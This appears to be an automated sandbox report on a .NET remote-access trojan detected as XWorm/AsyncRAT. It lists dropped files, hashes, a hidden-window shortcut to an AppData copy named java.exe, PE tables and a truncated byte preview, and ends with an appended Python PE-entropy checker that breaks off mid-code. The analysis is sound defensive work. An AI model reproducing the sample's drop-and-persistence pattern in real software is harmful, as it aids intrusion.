                                                                                SHA-512:A2B4EFCBE4B379F698ECC071FB914CF66A7A053EF4619DEE226D27C99D4FA8DDF80C2C82FD4DE797DD85DE5738C8AAE13078B8E1B5ACB24DB067026A566CB90D
                                                                                Malicious:false
                                                                                Preview:..P... .......7.......X\...;...{......................0.e......!...{?......|..h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{..................................F7.......|....................\......|...........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):16384
                                                                                Entropy (8bit):0.0795882601702125
                                                                                Encrypted:false
                                                                                SSDEEP:3:7Jml/yYeO8ANaAPaU1lBhMjAilluxmO+l/SNxOf:7ol6ztANDPaU0jVgmOH
                                                                                MD5:1901737C957717B61B9643E1F1803682
                                                                                SHA1:ED0E46891031D57CE36D77EA67AC5BD3C5F37C60
                                                                                SHA-256:158502733AA5B0FC68E3B052903552C942E45D5D6161E9BA818A25E7BDB97E32
                                                                                SHA-512:615E8E569AA861B3A58F9D6D988A3A2DE8EF84145FC67FFEE739EBB12CADD26BBB99CD22C51186F905032C09AADABBFE85E55D714917F6F9EBFD8089791EC618
                                                                                Malicious:false
                                                                                Preview:..#,.....................................;...{.......|...!...{?..........!...{?..!...{?..g...!...{?...................\......|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Roaming\java.exe
                                                                                File Type:CSV text
                                                                                Category:dropped
                                                                                Size (bytes):654
                                                                                Entropy (8bit):5.380476433908377
                                                                                Encrypted:false
                                                                                SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                Malicious:false
                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:modified
                                                                                Size (bytes):64
                                                                                Entropy (8bit):0.34726597513537405
                                                                                Encrypted:false
                                                                                SSDEEP:3:Nlll:Nll
                                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                Malicious:false
                                                                                Preview:@...e...........................................................
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:Generic INItialization configuration [WIN]
                                                                                Category:dropped
                                                                                Size (bytes):64
                                                                                Entropy (8bit):3.6722687970803873
                                                                                Encrypted:false
                                                                                SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovuEXn:EFYJKDoWr5FYJKDoG+n
                                                                                MD5:DE63D53293EBACE29F3F54832D739D40
                                                                                SHA1:1BC3FEF699C3C2BB7B9A9D63C7E60381263EDA7F
                                                                                SHA-256:A86BA2FC02725E4D97799A622EB68BF2FCC6167D439484624FA2666468BBFB1B
                                                                                SHA-512:10AB83C81F572DBAA99441D2BFD8EC5FF1C4BA84256ACDBD24FEB30A33498B689713EBF767500DAAAD6D188A3B9DC970CF858A6896F4381CEAC1F6A74E1603D0
                                                                                Malicious:false
                                                                                Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r[WIN]r
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Nov 29 13:20:08 2024, mtime=Fri Nov 29 13:20:08 2024, atime=Fri Nov 29 13:20:08 2024, length=89088, window=hide
                                                                                Category:dropped
                                                                                Size (bytes):750
                                                                                Entropy (8bit):5.050525353550501
                                                                                Encrypted:false
                                                                                SSDEEP:12:8iKlEO4AY0pnu8ChC4Tl8lXIsY//KCP3wJLd1A586EAjAsKllE+H8BUh+VpMV9mV:8i+mALD2l8lXUmFd1Z6bAsK/ENsA89m
                                                                                MD5:60671F02C3DDDF0BCE82CEEA7E672F9A
                                                                                SHA1:AF1ABABDF369A0C36879A04AC997C8EBA6B8B9DA
                                                                                SHA-256:1697488D5D15F6CB500474D006864B991A882F4EC4066F8091CDADA41616C056
                                                                                SHA-512:A275469EEBB1E7AEA3C621A48141104EE7FDDDF5DF33E51AF0CB4220778FCDAAEE73ABB7192AA5784532EFBE2E47EA38EBFB262E578C7541B51D27F6771EF9B2
                                                                                Malicious:false
                                                                                Preview:L..................F.... ...(...iB..(...iB..(...iB...\......................n.:..DG..Yr?.D..U..k0.&...&.......$..S...\..iB......iB......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2}Y]r...........................^.A.p.p.D.a.t.a...B.V.1.....}Y[r..Roaming.@......EW<2}Y[r..../.....................W...R.o.a.m.i.n.g.....Z.2..\..}Y.r .java.exe..B......}Y.r}Y.r............................0.j.a.v.a...e.x.e.......Y...............-.......X............_.......C:\Users\user\AppData\Roaming\java.exe........\.....\.....\.....\.....\.j.a.v.a...e.x.e.`.......X.......045012...........hT..CrF.f4... .|...]....-...-$..hT..CrF.f4... .|...]....-...-$.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):89088
                                                                                Entropy (8bit):6.687051336040018
                                                                                Encrypted:false
                                                                                SSDEEP:1536:XT1opub0jX2VNjYsBabpfkT8Kjht6CvOjTd2ogBTR7IPxgW4hYxxBlzo:D1Auoj6dBwbpfkTttvOjYogBiPxJ4hc4
                                                                                MD5:4347FB3A5B1EABF2E594A895A30B98F4
                                                                                SHA1:36993DF090A7F68C57F96FFE5724674520998AC8
                                                                                SHA-256:492A7DE87F0FF73DA5B30A460CE1FBE03A0D7EDF0634906F6A67D711B4A46751
                                                                                SHA-512:7157339421E0E51B3F3FA2659C273B428D2E63207977C5F4145FBAABB9BA866D60F8DF290E29DC5D203D241497D1891EE7302A83F5C069D5BA29928736416E01
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\java.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\java.exe, Author: Joe Security
                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\java.exe, Author: ditekSHen
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 82%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C;g.....................L.......,... ...@....@.. ....................................@.................................d,..W....@...I........................................................................... ............... ..H............text........ ...................... ..`.rsrc....I...@...J..................@..@.reloc...............Z..............@..B.................,......H........n..|.......&.....................................................(....*.r...p*. .W..*..(....*.r...p*. ...*.s.........s.........s.........s.........*.r5..p*. ....*.rO..p*. ....*.ri..p*. ..e.*.r...p*. .z..*.r...p*. .5..*..((...*.r...p*. S...*.r...p*. P4..*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&('...&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.r...p*. j...*.r...p*. ..p.*.r...p*. ..W.*.r...p*. ....*.r1..p*. .\=.*.rK..p*. .x!.*.re.
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:JSON data
                                                                                Category:dropped
                                                                                Size (bytes):55
                                                                                Entropy (8bit):4.306461250274409
                                                                                Encrypted:false
                                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                Malicious:false
                                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Entropy (8bit):6.687051336040018
                                                                                TrID:
                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                File name:file.exe
                                                                                File size:89'088 bytes
                                                                                MD5:4347fb3a5b1eabf2e594a895a30b98f4
                                                                                SHA1:36993df090a7f68c57f96ffe5724674520998ac8
                                                                                SHA256:492a7de87f0ff73da5b30a460ce1fbe03a0d7edf0634906f6a67d711b4a46751
                                                                                SHA512:7157339421e0e51b3f3fa2659c273b428d2e63207977c5f4145fbaabb9ba866d60f8df290e29dc5d203d241497d1891ee7302a83f5c069d5ba29928736416e01
                                                                                SSDEEP:1536:XT1opub0jX2VNjYsBabpfkT8Kjht6CvOjTd2ogBTR7IPxgW4hYxxBlzo:D1Auoj6dBwbpfkTttvOjYogBiPxJ4hc4
                                                                                TLSH:E893AE9CB7D40561D1FF5BB568B23202CA74EA630E03D70F68C951DA6B2B68C8D40BF9
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C;g.....................L.......,... ...@....@.. ....................................@................................
                                                                                Icon Hash:901c8e4653435b79
                                                                                Entrypoint:0x412cbe
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x673B439B [Mon Nov 18 13:39:39 2024 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                Instruction
                                                                                jmp dword ptr [00402000h]
add byte ptr [eax], al   (repeated for the rest of the listing: the bytes after the 6-byte CLR stub are zero padding, and 00 00 disassembles to this instruction)
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x12c64 | 0x57 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x14000 | 0x49d2 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1a000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x10cc4 | 0x10e00 | 9a565d2d742f2cbc26acefad1e5a8dfb | False | 0.5816116898148148 | data | 6.154683890959466 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x14000 | 0x49d2 | 0x4a00 | c0d2a6732f0434ac63b5df3a6e7b062f | False | 0.9642630912162162 | data | 7.883693475319175 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x1a000 | 0xc | 0x200 | a5923cbf3cc95dc01c44e397433c2633 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x14130 | 0x4466 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 1.000913763563678
RT_GROUP_ICON | 0x18598 | 0x14 | data | | | 0.9
RT_VERSION | 0x185ac | 0x23c | data | | | 0.4737762237762238
RT_MANIFEST | 0x187e8 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
DLL | Import
mscoree.dll | _CorExeMain
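The static facts in the tables above (a populated COM descriptor directory, an IAT of one slot at RVA 0x2000, an entry point that is nothing but `jmp dword ptr [00402000h]`, a single mscoree.dll!_CorExeMain import, and a .rsrc section at 7.88 bits of entropy against 6.15 for .text) are exactly what an analyst checks by hand when deciding whether a .NET executable is a thin loader carrying a packed payload. The following is an added example written for this page, not Joe Sandbox's own code: a standard-library PE32 parser that reads the data directories and section table, tests that directory 14 (COM descriptor) is set, verifies that the entry point is the 6-byte `FF 25` stub jumping through the IAT slot the loader fills with _CorExeMain, and computes per-section 8-bit Shannon entropy, flagging anything at or above 7.0 bits per byte (an assumed threshold). The PE it analyses is constructed inline to mirror the report's layout (image base 0x400000, IAT at RVA 0x2000, CLR header at RVA 0x2008); it is not the analysed sample, and its hashes and sizes do not match the tables above.

```python
"""Added example: reproduce the .NET-stub and section-entropy checks from raw PE bytes."""
import hashlib
import math
import struct

ENTROPY_THRESHOLD = 7.0  # assumption: bits/byte at or above this is treated as packed or encrypted


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for empty input, 8.0 for a uniform byte distribution."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(buf: bytes) -> dict:
    """Parse DOS header, COFF header, optional-header data directories and the section table."""
    if buf[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    if buf[e_lfanew:e_lfanew + 4] != b"PE\0\0":
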